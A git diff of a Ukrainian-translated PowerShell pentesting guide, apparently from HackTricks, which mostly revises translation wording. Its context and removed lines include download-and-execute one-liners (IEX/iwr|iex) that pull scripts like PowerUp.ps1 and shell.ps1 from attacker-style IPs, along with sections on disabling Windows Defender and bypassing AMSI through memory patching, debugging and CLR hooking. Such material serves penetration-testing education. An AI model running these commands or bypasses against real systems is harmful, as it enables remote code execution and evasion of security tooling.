diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md index 476c45aa1..faae7c6d2 100644 --- a/src/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md @@ -18,7 +18,6 @@ Get-Command -Module ``` ## Завантажити та виконати ```powershell -g echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3 @@ -71,7 +70,7 @@ PS> powershell -EncodedCommand ## [AppLocker Policy](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md) -## Увімкнути WinRM (Remote PS) +## Увімкнути WinRM (Віддалений PS) ```powershell enable-psremoting -force #This enables winrm @@ -85,7 +84,7 @@ $_ $_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm } ``` -## Вимкнення Захисника +## Вимкнення Защитника ```powershell # Check status Get-MpComputerStatus @@ -117,7 +116,7 @@ ValueData : 0 **`amsi.dll`** завантажується у ваш процес і має необхідні **експорти** для взаємодії з будь-яким додатком. І оскільки він завантажений у пам'яті процесу, який ви **контролюєте**, ви можете змінити його поведінку, **перезаписуючи інструкції в пам'яті**. Це дозволяє не виявляти нічого. -Отже, мета обходів AMSI полягає в тому, щоб **перезаписати інструкції цього DLL у пам'яті, щоб зробити виявлення безглуздим**. +Отже, мета обходів AMSI, які ви будете використовувати, полягає в тому, щоб **перезаписати інструкції цього DLL у пам'яті, щоб зробити виявлення безглуздим**. **Генератор обходу AMSI** веб-сторінка: [**https://amsi.fail/**](https://amsi.fail/) ```powershell @@ -168,7 +167,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html Check [**this post for detailed info and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Вступ: -Ця нова техніка базується на підключенні викликів API методів .NET. Як виявилося, методи .NET потрібно компілювати в рідні машинні інструкції в пам'яті, які в кінцевому підсумку виглядають дуже схоже на рідні методи. Ці скомпільовані методи можуть бути підключені, щоб змінити потік управління програми. +Ця нова техніка базується на підключенні викликів API методів .NET. Як виявилося, методи .NET потрібно компілювати в рідні машинні інструкції в пам'яті, які в кінцевому підсумку виглядають дуже схоже на рідні методи. Ці скомпільовані методи можуть бути підключені для зміни потоку управління програми. Кроки для виконання підключення викликів API методів .NET: @@ -181,7 +180,7 @@ Check [**this post for detailed info and the code**](https://practicalsecurityan ### AMSI Bypass 3 - SeDebug Privilege -[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) ви можете побачити, як з достатніми привілеями для налагодження процесів ви можете запустити процес powershell.exe, налагодити його, спостерігати, коли він завантажує `amsi.dll`, і вимкнути його. +[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) ви можете побачити, як з достатніми привілеями для налагодження процесів ви можете запустити процес powershell.exe, налагоджувати його, контролювати, коли він завантажує `amsi.dll`, і вимкнути його. ### AMSI Bypass - More Resources